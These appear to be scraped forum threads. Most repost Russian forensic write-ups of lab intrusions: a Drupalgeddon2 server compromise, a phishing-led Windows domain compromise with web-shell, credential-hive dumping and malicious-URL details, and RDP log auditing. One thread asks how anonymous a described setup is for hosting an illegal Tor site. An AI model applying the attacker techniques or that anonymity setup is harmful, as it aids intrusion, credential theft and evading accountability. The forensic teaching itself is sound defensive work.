![Содержимое файла /var/log/btmp](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24385%2F23.png&hash=70dd2ccd23b99bccaa571a57cfaf308d)
В этом файле находим следы попыток неудачного входа пользователя root c IP- адреса 192.168.210.131. Происходит подбор пароля к службе SSH.

Итак, на этом этапе мы с тобой нашли точку входа злоумышленников в систему. 5 октября 2019 года в 13:01:27 (UTC+2) злоумышленники эксплуатировали уязвимость drupalgeddon2 (CVE-2018-7600) в CMS Drupal версии 7.26. Создали пользователя php, добавили пользователей php и mail в группу sudo. Далее авторизовались в системе от пользователя mail. Мы также выяснили, что источником компьютерной атаки был IP-адрес 192.168.210.131.

ИЩЕМ МЕТОДЫ ПОСТЭКСПЛУАТАЦИИ

Получив доступ к системе, злоумышленник обычно ищет способы закрепиться в ней. Проанализируем действия пользователей root, php и mail, чтобы понять, как это происходило. Информация о выполненных командах хранится в файле .bash_history домашнего каталога каждого пользователя. Действия пользователя root хранятся в файле /root/.bash_history.

![Содержимое файла .bash_history пользователя root](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24386%2F24.png&hash=43567a63588f64d843bb70be6df84e8f)
От пользователя root выполнены следующие интересные команды:

rm 37282.c — удаление файла 37282.c;
vim scripts/update.php — создание файла.

Переходим к пользователю mail.
![Содержимое файла .bash_history пользователя mail](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24387%2F25.png&hash=acf82ac12192e9cf7e1ad95456c9a6a5)
Пользователь mail выполнил команду sudo su - с целью повышения привилегий, а затем passwd php — для смены пароля пользователя php.

Восстанавливаем стертый файл

Мы с тобой просканировали виртуальный диск с помощью R-Studio. Теперь найдем стертый файл 37282.c. В R-Studio переходим на вкладку «Инструменты → Найти», выбираем «Файлы» и вводим название файла.

В каталоге /tmp обнаружен файл 37282.c, восстановим его и проанализируем.

![Обнаруженный файл](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24388%2F26.png&hash=5602cbda3b6b682947993ba14d38b679)
Файл создан 5 октября 2019 года в 14:02:18 (UTC+3). Имей в виду, что R-Studio отображает временную метку файлов с учетом твоего системного времени.

![Содержимое файла 37282.c](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24389%2F27.png&hash=c83d0967e24a249d4abd3b697ef9c925)
Восстановленный файл — это эксплоит для уязвимости CVE-2015-1328, который позволяет локальным пользователям получить root-доступ. Автор его — rebel.

Найдем файл /var/www/html/jabc/scripts/update.php.

![Дата создания файла update.php](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24390%2F28.png&hash=2f2f204dd6e77efb2318be3f6c4301d7)
5 октября 2019 года в 14:17:48 (UTC+3) злоумышленники создали файл update.php.

![Содержимое файла update.php](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24391%2F29.png&hash=7cc4fcfe3346645f9bc39d7b850b7e7f)
Это PHP-шелл, который позволяет получать доступ к системе на постоянной основе. Для выполнения команд злоумышленники отправляют GET-запрос с параметром cmd=.

СТРОИМ ТАЙМЛАЙН СОБЫТИЙ

У нас накопилось множество временных меток в разных форматах. Системное время операционной системы — Europe/Brussels. Во многих европейских странах остался переход с летнего времени на зимнее. Переход совершается 31 октября. Если события происходят до 31 октября, то формат будет UTC+2 — это летнее время, а после 31 октября — UTC+1. Приведем к общему формату UTC.

5 октября 2019 года 11:01:27 злоумышленники проэксплуатировали уязвимость CVE-2018-7600 в CMS Drupal версии 7.26, загрузили оболочку Meterpreter.
В 11:02:18 загрузили файл 37282.c, скомпилировали систему и повысили свои привилегии до root.
В 11:06:38 создали пользователя php и добавили его в группу sudo.
В 11:09:31 добавили пользователя mail в группу sudo.
В 11:17:48 создали файл update.php с целью сохранения постоянства в системе.
В 11:23:34 авторизовались в системе под пользователем mail c IP-адреса 192.168.210.131, порт 57708.

Для создания таймлайнов удобно использовать Plaso. Там есть очень удобный скрипт [Psteal](https://plaso.readthedocs.io/en/latest/sources/user/Using- psteal.html) , который умеет извлекать события из образа диска системы. Вот как его использовать:

Code:Copy to clipboard

python3 psteal.py --source Webserver.E01 -w timeline.csv

Когда скрипт отработает, ты получишь файл CSV со всей последовательностью временных меток.

ВЫВОДЫ

Мы с тобой провели расследование киберинцидента, нашли точку входа злоумышленников, выявили дальнейшие действия после взлома веб‑сервера и построили таймлайн событий, который можно будет смело включать в отчет.

По результатам решения кейса на CyberDefenders необходимо ответить на ряд вопросов, но я намеренно показал лишь процесс решения и не буду давать тебе готовые ответы. Можешь повторить процесс и самостоятельно ответить на вопросы для закрепления материала.

Автор rayhunt454
xakep.ru

Обсуждаем анонимность TOR-сайта

ID: 676533bbb4103b69df371b37
Thread ID: 58267
Created: 2021-10-28T08:20:08+0000
Last Post: 2022-03-10T07:21:18+0000
Author: Dexter DeShawn
Replies: 41 Views: 2K

И так есть комп, в который мы вставялем безлимитный 4G модем оформленный на левого человека и включаем интернет.
Запускаем общественную VPN-прогу типа Windscribe с левым Pro-аккаунтом без ограничений и запускаем её.
В итоге получаем выход в интернет через VPN, где IP у всех одинаковый, кто юзает эту VPN-прогу.

Далее запускаем VirtualBox, где унас предвартельно установлены OS Whonix Workstation и Whonix Gateway, где весь траффик по умолчанию идёт через TOR.
Поднимаем ТОR-сервер на Whonix и поднимаем нелегальный сайт с адресом в Tor- сети.

Вопрос: Насколько анонимен такой подход к запуску сайта?

Уроки форензики. Расследуем киберинцидент CyberCorp Case 1.

ID: 676533bbb4103b69df371b3b
Thread ID: 59590
Created: 2021-12-02T15:41:11+0000
Last Post: 2022-02-25T16:14:35+0000
Author: tabac
Prefix: Статья
Replies: 2 Views: 2K

Специалисты по атакующей безопасности оттачивают навыки на Hack The Box, Root Me и VulnHub, а специально для защитников существует платформа CyberDefenders. В этой статье я покажу ход расследования киберинцидента на примере лабораторной работы с этого ресурса — CyberCorp Case 1.

Мы научимся получать необходимые данные из основных артефактов операционной системы Windows. Наша задача — понять, как злоумышленник скомпрометировал компьютер в сети организации, как закрепился в системе, какие вредоносные файлы использовал и к каким объектам локальной сети получил доступ.

По сценарию кейса в исходящем трафике инфраструктуры компании CyberCorp выявлен ряд аномалий, что свидетельствует о ее компрометации. Специалисты по реагированию на компьютерный инцидент изолировали один из потенциально скомпрометированных хостов от корпоративной сети и собрали основные артефакты Windows. Файлы артефактов находятся в архиве, который необходимо загрузить.

По результатам решения кейса нас попросят ответить на ряд вопросов. Я покажу лишь ход решения и не буду подсвечивать ответы. Ради тренировки можешь повторить весь процесс самостоятельно и ответить — для закрепления материала.

ПОЛУЧЕННЫЕ АРТЕФАКТЫ WINDOWS

Amcache.hve — файл реестра, содержащий информацию о запускаемых приложениях. Начиная с Windows 8 и Windows Server 2012 путь к файлу реестра Amcache хранится в %SystemRoot%\AppCompat\Programs\Amcache.hve.
AppCompatCache.reg — информация из ключа HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache куста реестра SYSTEM (C:\Windows\System32\configSystem). В данном ключе хранится артефакт Shimcache — это механизм, который обеспечивает обратную совместимость старых приложений с более новыми версиями Windows. В нем содержится следующая информация: путь к исполняемому файлу, размер файла, время последнего изменения.
Файлы реестра: default, SAM, SECURITY, software, system. Расположены эти файлы в каталоге C:\Windows\System32\config.
Memdump — файл образа оперативной памяти.
Logs — файлы логов операционной системы. Они находятся в каталоге C:\Windows\System32\winevt\Logs.
User Registry Hives — файл NTUSER.DAT содержит информацию, связанную с действием пользователя. Файлы NTUSER.DAT хранятся в каталоге %userprofile%.
Windows Prefetch — файлы, предназначенные для ускорения запуска приложений. Файлы Prefetch содержат имя исполняемого файла, список динамических библиотек, используемых исполняемым файлом, количество запусков исполняемого файла и метку времени, указывающую, когда программа была запущена в последний раз. Данные файлы хранятся в каталоге C:\Windows\Prefetch.
MFT (главная таблица файлов) — системный файл, содержащий метаданные объекта файловой системы. Этот файл расположен в корне каждого раздела NTFS, выгрузить его можно с помощью FTK Imager.
OBJECTS.DATA — файл, содержащий постоянные классы WMI (Windows Management Instrumentation). Он расположен в %SystemRoot%\System32\wbem\Repository.
Сетевой трафик, полученный в результате мониторинга инфраструктуры компании.

ЭТАПЫ РАССЛЕДОВАНИЯ

Поиск точки входа в систему. На данном этапе выясним, как злоумышленник скомпрометировал систему и какие использовал вредоносные файлы.
Поиск способа закрепления. Выясним, как злоумышленники обеспечили себе постоянный доступ к системе.
Поиск методов бокового перемещения по сети. На этом этапе выявим действия злоумышленника после получения доступа к скомпрометированному компьютеру.

ИСПОЛЬЗУЕМЫЕ УТИЛИТЫ

Утилиты Эрика Циммермана: AmcacheParser , Registry Explorer , AppCompatCacheParser , MFTECmd.
Утилиты NirSoft: fulleventlogview , winprefetchview.
UserAssist.
Wireshark — инструмент для анализа сетевых протоколов.
Olevba — инструмент для извлечения и анализа исходного кода макросов VBA из документов MS Office (OLE и OpenXML).
Volatility 3 — инструмент для извлечения данных из образа оперативной памяти.

Перед тем как начать изучать артефакты скомпрометированного компьютера, получим информацию о версии операционной системы, дату установки, имя пользователя. Для этого загрузим куст реестра software в утилиту Registry Explorer и перейдем к ключу SOFTWARE\Microsoft\Windows NT\CurrentVersion.

![Информация об исследуемом компьютере](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23872%2F1.png&hash=06ef140916f5f3e930e1505255d7cb3e)
Информация об исследуемом компьютере

На исследуемом компьютере установлена операционная система Windows 10 Enterprise Evaluation, дата установки — 17 июня 2020 года в 7:13:49 (параметр InstallDate), версия сборки — 17134, владелец — John Goldberg.

ПОИСК ТОЧКИ ВХОДА

На данном этапе исследуем образ оперативной памяти, сетевой трафик и главную таблицу разделов.

Анализ образа оперативной памяти

Найдем активные сетевые соединения и вредоносный процесс. Для этого воспользуемся утилитой Volatility 3.

Выявим все сетевые соединения с состоянием ESTABLISHED и проверим все IP- адреса на VirusTotal.

Code:Copy to clipboard

python3 vol.py -f memdump.mem windows.netscan.NetScan

![Вредоносное сетевое соединение](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23871%2F2.png&hash=850e789c277beccfe0d0f81dcb7ae0bd)
Вредоносное сетевое соединение

Процесс rundll32.exe (PID процесса — 4224) установил сетевое соединение с управляющим сервером по адресу 196.6.112.70. Ознакомимся с результатом проверки выбранного адреса на VirusTotal.

Получим дерево процессов и найдем процесс с идентификатором 4224.

Code:Copy to clipboard

python3 vol.py -f memdump.mem windows.pstree.PsTree

![Информация о вредоносном процессе](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23870%2F3.png&hash=83ecc3ba569cd1764b62e317df3ff090)
Информация о вредоносном процессе

Родительский идентификатор вредоносного процесса rundll32.exe — 7320, но процесса с таким идентификатором не обнаружено.

Воспользуемся плагином malfind утилиты Volatility 3 и найдем код, внедренный в адресное пространство процессов операционной системы.

Code:Copy to clipboard

python3 vol.py -f memdump.mem windows.malfind.Malfind

![Результат работы плагина malfind](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23869%2F4.png&hash=9e18ab6aab26104d219ac4fefb03191e)
Результат работы плагина malfind

Из рисунка выше видно, что вредоносный код внедрен в адресное пространство процесса winlogon.exe (PID 3232).

Отлично! Мы обнаружили управляющий центр и вредоносный процесс.

Анализ сетевого трафика

Проанализируем сетевой трафик при помощи Wireshark и найдем интересные артефакты. В первом дампе трафика обнаружена почтовая сессия по протоколу SMTP. Попробуем получить сообщения eml. Для этого переходим на вкладку «Файл → Экспортировать объекты → IMF». Сохраним все сообщения для исследования.

![Список сообщений, обнаруженных в сетевом трафике](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23868%2F5.png&hash=6ed806b1f3e37e9e3beb9b63b04865c4)
Список сообщений, обнаруженных в сетевом трафике

В сообщении от richard.gorn@gmail.com содержится запароленный архив attach.zip. Исследуем файлы из него.

![Содержимое сообщения](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23867%2F6.png&hash=179a7fbbfac68d20a3e2159cdd748bd9)
Содержимое сообщения

Как видишь, пароль от архива нашелся в письме.

Анализ вредоносных файлов

В архиве лежит документ Why Saudi Arabia Will Lose The Next Oil Price War.docx (MD5: aa7ee7f712780aebe9136cabc24bf875). Меняем расширение на .zip и смотрим его содержимое. Вредоносных макросов здесь нет, но в файле ./word/_rels/settings.xml.rels обнаружилась ссылка на загрузку шаблона Supplement.dotm. Такой вектор атаки называется Remote Template Injection и подробно описан [в блоге Сунгвана Цоя](https://blog.sunggwanchoi.com/remote- template-injection/).

Основной принцип атаки заключается в следующем. Злоумышленники залили на свой сервер файл шаблона документа Word (.dotm) и внедрили в код документа Why Saudi Arabia... .docx ссылку на загрузку вредоносного шаблона. Если документ открыть, загрузится шаблон, содержащий макрос.
![Адрес для загрузки вредоносного документа .dotm](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23866%2F7.png&hash=429673e52cca027498a0b24d6c5a9191)
Адрес для загрузки вредоносного документа .dotm

Попробуем получить этот документ из образа оперативной памяти. Для этого воспользуемся плагином FileScan утилиты Volatility 3.

Code:Copy to clipboard

python3 vol.py -f memdump.mem windows.filescan.FileScan | grep dotm

![Документы с расширением dotm, выявленные в образе оперативной памяти](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23865%2F8.png&hash=1bdcc63821689075f53ceeddc4a54efc)
Документы с расширением dotm, выявленные в образе оперативной памяти

Выгрузим документ, расположенный по адресу 0xcd8401aea3f0. Для этого воспользуемся плагином dumpfiles утилиты Volatility 3.

Code:Copy to clipboard

python3 vol.py -f memdump.mem windows.dumpfiles.DumpFiles --virtaddr 0xcd8401aea3f0

![Результаты работы плагина dumpfiles](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23864%2F9.png&hash=85363cfdc57f0209be47ef0b65bbbd21)
Результаты работы плагина dumpfiles

Мы получили вредоносный шаблон Microsoft Office c длинным названием и расширением .dotm.dat. Проанализируем шаблон c помощью утилиты olevba. Переименуем его в dotm_malicious.

Code:Copy to clipboard

olevba dotm_malicious

В результате работы olevba мы получили скрипт на VBA, содержащийся в шаблоне документа. Исследуем код скрипта.
![Участок вредоносного кода](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23863%2F10.png&hash=9d27cf96956fe04d1a72464b37fb9b48)
Участок вредоносного кода

Вредоносный скрипт загружает полезную нагрузку master_page и сохраняет ее в следующем ключе реестра:

Code:Copy to clipboard

HKEY_USERS\S-1-5-21-3899523589-2416674273-2941457644-1104\Software\RegisteredApplications\AppXs42fd12c3po92dynnq2r142fs12qhvsmyy

Далее он загружает PowerShell-скрипт wrapper_page и сохраняет в каталог

Code:Copy to clipboard

C:\Users\john.golberg\AppData\Roaming\\Microsoft\Office\Recent\tmpA7Z2.ps1

Следующим этапом происходит закрепление в системе с использованием WMI, но об этом мы поговорим чуть позже.

Выгрузим скрипт на PowerShell, чтобы изучить его содержимое.

![Участок вредоносного скрипта tmp7AZ2.ps1](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23862%2F11.png&hash=6ccdc39c2702a95492980e584a9cc11d)
Участок вредоносного скрипта tmp7AZ2.ps1

Скрипт берет полезную нагрузку из ключа реестра (переменная $rk), декодирует ее из Base64, а далее выполняется [спуфинг родительского процесса](https://www.ired.team/offensive-security/defense-evasion/parent- process-id-ppid-spoofing) dwm.exe. Вредоносная нагрузка загружается в память созданного процесса и мигрирует в процесс winlogon.exe.

Выгрузим вредоносную нагрузку. Загрузим куст NTUSER.DAT пользователя john.goldberg в утилиту Reg Explorer. Перейдем в Software\RegisteredApplications и найдем ключ AppXs42fd12c3po92dynnq2r142fs12qhvsmyy.

![Вредоносная нагрузка](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23861%2F12.png&hash=a8f32e8122567604655000bd5478416a)
Вредоносная нагрузка

Декодируем полезную нагрузку, получим MD5-сумму и проверим ее на VirusTotal.

Анализ MFT

Разберем, в какое время пользователь открыл вредоносный документ Why Saudi Arabia... .docx в системе, чтобы понимать, когда произошел инцидент. Для этого проанализируем файл MFT. Воспользуемся инструментом MFTECmd.exe и выгрузим информацию об объектах файловой системы в файл CSV.

Code:Copy to clipboard

MFTECmd.exe -f $MFT.copy0 --csv .\RESULT\MFT

Мы получили файл, содержащий пути ко всем файлам файловой системы, а также метки времени. Через поиск найдем информацию о документе Why Saudi Arabia Will Lose The Next Oil Price War.docx. Все метки времени в таблице MFT в UTC, но московское время — UTC+3.

![Информация о запуске вредоносного документа по UTC](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23860%2F13.png&hash=bc2ed835f761f62c3b05cc130fdf207d)
Информация о запуске вредоносного документа по UTC

В таблице MFT представлены две метки времени создания файла: STANDART_INFO и FILE_INFO. Злоумышленник использует утилиты антикриминалистики, которые изменяют метку времени STANDART_INFO, поэтому необходимо смотреть на метку времени FILE_INFO. Подробности описаны в блоге Cyb3rSn0rlax.
Итак, по результатам первого этапа мы обнаружили, что пользователь john.goldberg получил по электронной почте сообщение, содержащее вредоносное вложение. 20.06.2020 в 22:27:31 (по московскому времени) пользователь открыл документ Why Saudi Arabia... .docx, который загрузил шаблон c http://75.19.45.11/Suplement.dotm, содержащий макрос. Вредоносный макрос загрузил полезную нагрузку и PowerShell-скрипт.

ЗАКРЕПЛЕНИЕ В СКОМПРОМЕТИРОВАННОЙ СИСТЕМЕ

На этом этапе проанализируем файл OBJECTS.DATA, но сначала немного поговорим о сохранении постоянства в системе с помощью WMI.

WMI (Windows Management Instrumentation) — набор инструментов, предназначенных для управления системами Windows как локально, так и удаленно. Одна из техник закрепления в системе через WMI — это WMI Subscriptions (подписки WMI). Эта техника запускает действие при возникновении события. Действия и события могут быть определены пользователем. В определениях WMI действия называются потребителями (Consumers), а события — фильтрами (Filters). Существует также третий компонент, который связывает их вместе, — привязка (__FilterToConsumerBinding).

Значит, наша задача — обнаружить в файле OBJECTS.DATA связку действия и события (__FilterToConsumerBinding). Можно открыть исследуемый файл с помощью hex-редактора и в поиске вбить строку __FilterToConsumerBinding, но мы воспользуемся утилитой PyWMIPersistenceFinder.

Code:Copy to clipboard

python PyWMIPersistenceFinder.py OBJECTS.DATA

![Результат работы утилиты PyWMIPersistenceFinder.py](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23859%2F14.png&hash=699da4cd4c86b7a828af11fc670dfe67)
Результат работы утилиты PyWMIPersistenceFinder.py

Мы обнаружили название события LogRotate Event и название действия Logrotate Consumer.

При возникновении события авторизации пользователя в системе запускается действие — запуск вредоносного скрипта tmpA7Z2.ps1. Вредоносный скрипт запускается, когда пользователь вводит логин и пароль от своей учетной записи и начинает работать в системе.

БОКОВОЕ ПЕРЕМЕЩЕНИЕ ПО СЕТИ

Для анализа дальнейших действий злоумышленника воспользуемся логами Windows.

Загрузим каталог Logs в утилиту fulleventlogview.exe. Для этого перейдем на вкладку File → Choose Data Source и укажем путь, где хранятся файлы логов. Перейдем на вкладку Options → Advanced Options и укажем, с какого времени показать события операционной системы. В качестве начальной точки укажем 20.06.2020 22:27:31 — это метка времени создания вредоносного файла Why Saudi Arabia... .docx.

![Обращение к вредоносному ресурсу для получения шаблона](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23858%2F15.png&hash=3d5c6b40ace83854d074955e942d8823)
Обращение к вредоносному ресурсу для получения шаблона

В 22:27:46 зафиксировано исходящее сетевое соединение к вредоносному ресурсу 75.19.45.11, вызвано файлом winword.exe. Далее выполняется вредоносный макрос, который содержится в загруженном шаблоне.

![Загрузка утилит для постэксплуатации](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F1a66651904658fc63e060ef40bcab940%2F23907%2F16.png&hash=6027d3e2d14f929d73c518de9e4a93d3)
Загрузка утилит для постэксплуатации

В 22:31:08 злоумышленник загрузил с адреса http://196.6.112.70/disco.jpg вспомогательные утилиты для бокового перемещения по сети и сохранил их в файл C:\Windows\TEMP\disco.jpg.

![Декодирование загруженного файла по алгоритму Base64](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23856%2F17.png&hash=977a65e5c40e3d9e54518248f41baa3d)
Декодирование загруженного файла по алгоритму Base64

В 22:31:16 декодировали загруженный файл disco.jpg по алгоритму Base64 и сохранили в файл C:\Windows\TEMP\sh.exe.

![Запуск исполняемого файла sh.exe](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23855%2F18.png&hash=63e0429bc9cf0a2913846d79eefca554)
Запуск исполняемого файла sh.exe

В 22:31:34 запустили исполняемый файл sh.exe (сборщик данных для BloodHound), результат работы которого сохранен в файл ddr.zip.

Проанализируем таблицу MFT и посмотрим, какие еще файлы были созданы в каталоге C:\Windows\Temp. Для этого откроем полученный файл CSV, содержащий объекты файловой системы, и найдем все файлы в каталоге Windows\Temp.

![Файл, обнаруженный в каталоге C:\Windows\Temp](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23854%2F19.png&hash=eb0bdff0b3d047d248f42f347c6a6231)
Файл, обнаруженный в каталоге C:\Windows\Temp

В 22:31:38 создан файл с расширением bin.

Следующий этап для злоумышленника — получение логинов и паролей пользователей.

![Список локальных администраторов скомпрометированного компьютера](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23853%2F20.png&hash=e173aabdf91247e95c7cf70834374ed5)
Список локальных администраторов скомпрометированного компьютера

В 22:33:10 перечислили всех локальных администраторов пользователей скомпрометированного компьютера.

![Сохранение куста реестра sam](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F1a66651904658fc63e060ef40bcab940%2F23908%2F21.png&hash=2bebc073d1046feb4a001e0215a04b69)
Сохранение куста реестра sam
<https://st768.s3.eu- central-1.amazonaws.com/9aa14d36b4fac38901b8d42940344fb7/23851/22.png>
![Сохранение куста реестра system](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23851%2F22.png&hash=952764a9ea87f3aeeca747ca37bae3a6)
Сохранение куста реестра system

В 22:33:18 злоумышленник с применением утилиты reg.exe (программа в Windows для настройки реестра) выгрузил куст реестра hklm\sam и сохранил его в файл C:\Windows\TEMP\sa.tmp. В 22:33:24 выгрузил куст реестра hklm\system и сохранил в файл C:\Windows\Temp\sy.tmp.

Следующим этапом злоумышленник выгружает файлы sa.tmp и sy.tmp и получает из них NTLM-хеши паролей пользователей. Теперь ему достаточно пробрутить полученные хеши пользователей с имеющимся в его арсенале словарем. Пароль !!feb15th2k6!! — словарный и есть в файле [rockyou.txt](https://github.com/brannondorsey/naive- hashcat/releases/download/data/rockyou.txt).

![Запрос на получение адреса контроллера домена](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23850%2F23.png&hash=16f0a0f23815c1f986d95f6b0386f9dd)

Запрос на получение адреса контроллера домена

![Получение доступа к административному ресурсу контроллера домена](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F9aa14d36b4fac38901b8d42940344fb7%2F23849%2F24.png&hash=acdab5d55b2ac7ab3d975d2dce6956de)
Получение доступа к административному ресурсу контроллера домена

В 22:35:38 злоумышленник узнал пароль !!feb15th2k6!! пользователя cybercorp\backupsrv и подключился к административному ресурсу \\192.168.184.100\C$ контроллера домена, тем самым получив полный доступ к домену. Ему осталось лишь загрузить вредоносный модуль на скомпрометированный контроллер домена, чтобы закрепиться на нем.

ВЫВОДЫ

Мы с тобой расследовали киберинцидент и выявили такую картину. Злоумышленник использовал письмо по электронной почте с вредоносным вложением и скомпрометировал хост с адресом 192.168.100.130. Затем он загрузил полезную нагрузку, которую записал в реестр, и скрипт на PowerShell, который запускается при вводе авторизационных данных в системе. Далее злоумышленник загрузил утилиту для перечисления данных контроллера домена, получил авторизационные данные пользователя cybercorp\backup и скомпрометировал контроллер домена.

Таким образом, мы восстановили полную картину действий, а значит, наша работа как криминалистов закончена.

Автор rayhunt454
хакер.ру

Просмотр и анализ логов RDP подключений в Windows

ID: 676533bbb4103b69df371b3d
Thread ID: 63262
Created: 2022-02-20T15:35:10+0000
Last Post: 2022-02-20T15:35:10+0000
Author: cutedemon
Prefix: Статья
Replies: 0 Views: 2K

В этой статье мы рассмотрим, особенности аудита / анализа логов RDP подключений в Windows. Как правило, описанные методы могут пригодиться при расследовании различных инцидентов на терминальных / RDS серверах Windows, когда от системного администратора требуется предоставить информацию: какие пользователи входили на RDS сервер, когда авторизовался и завершил сеанс конкретный пользователь, откуда / с какого устройства (имя или IP адрес) подключался RDP-пользователь. Я думаю, эта информация будет полезна как для администраторов корпоративных RDS ферм, так и владельцам RDP серверов в интернете (Windows VPS как оказалось довольно популярны).

Статья применима при исследовании RDP логов как в Windows Server 2008 R2, 2012/R2, 2016, так и в соответствующих десктопных версиях Windows (Windows 7, 8.1, 10).
Как и другие события, логи RDP подключения в Windows хранятся в журналах событий. Откройте консоль журнала событий (Event Viewer). Есть несколько различных журналов, в которых можно найти информацию, касающуюся RDP подключения.

Click to expand...

В журналах Windows содержится большое количество информации, но быстро найти нужное событие бывает довольно сложно. Когда пользователь удаленно подключается к RDS серверу или удаленному столу (RDP) в журналах Windows генерируется много событий. Мы рассмотрим журналы и события на основных этапах RDP подключения, которые могут быть интересны администратору:

Network Connection

Authentication

Logon

Session Disconnect/Reconnect

Logoff

Click to expand...

Network Connection: – установление сетевого подключение к серверу от RDP клиента пользователя. Событие с EventID – 1149 (Remote Desktop Services: User authentication succeeded). Наличие этого события не свидетельствует об успешной аутентификации пользователя. Этот журнал находится в разделе Applications and Services Logs - > Microsoft -> Windows -> Terminal-Services- RemoteConnectionManager -> Operational. Включите фильтр по данному событию (ПКМ по журналу-> Filter Current Log -> EventId 1149).

**В результате у вас получится список с историей всех сетевых RDP подключений к данному серверу. Как вы видите, в логах указывается имя пользователя, домен (используется NLA аутентификация,[при отключенном NLA](https://winitpro.ru/index.php/2014/06/25/windows-2012-rds-ne- podklyuchayutsya-rdp-klienty-windows-xp/#h2_2) текст события выглядит иначе) и IP адрес компьютера, с которого осуществляется RDP подключение.

**Authentication: – успешная или неуспешная аутентификация пользователя на сервере. Журнал Windows - > Security. Соответственно нас могут интересовать события с EventID – 4624 (успешная аутентификация — An account was successfully logged on) или 4625 (ошибка аутентификации — An account failed to log on). Обратите внимание на значение LogonType в событии. При входе через терминальную службу RDP — LogonType = 10 или 3. Если LogonType = 7, значит выполнено переподключение к уже имеющейся RDP сессии.
**

Вы можете использовать события с ошибками аутентфикации для защиты от удаленного перебора паролей к RDP. Вы можете автоматически блокировать на файерволе такие IP адреса простым PowerShell скриптом

Click to expand...

При этом имя пользователя содержится в описании события в полеAccount Name** , имя компьютера в Workstation Name , а имя пользователя в Source Network Address.**

Обратите внимание на значение поляTargetLogonID** – это уникальный идентификатор сессии пользователя с помощью которого можно отслеживать дальнейшую активность данного пользователя. Однако при отключении от RDP сессии (disconnect) и повторного переподключения в сессию, пользователю будет выдан новый TargetLogonID (хотя RDP сессия осталась той же самой).**

Click to expand...

**Вы можете получить список событий успешных авторизаций по RDP (событие 4624) с помощью такой команды PowerShell.

Code:Copy to clipboard

Get-EventLog security -after (Get-date -hour 0 -minute 0 -second 0) | ?{$_.eventid -eq 4624 -and $_.Message -match 'logon type:\s+(10)\s'} | Out-GridView

**Logon: – RDP вход в систему, событие появляющееся после успешной аутентификации пользователя. Событие с EventID – 21 (Remote Desktop Services: Session logon succeeded). Этот журнал находится в разделе Applications and Services Logs - > Microsoft -> Windows -> TerminalServices-LocalSessionManager -> Operational. Как вы видите здесь можно узнать идентификатор RDP сессии для пользователя — Session ID.

**Событие с EventID – 21 (Remote Desktop Services: Shell start notification received) означает успешный запуск оболочки Explorer (появление окна рабочего стола в RDP сессии).

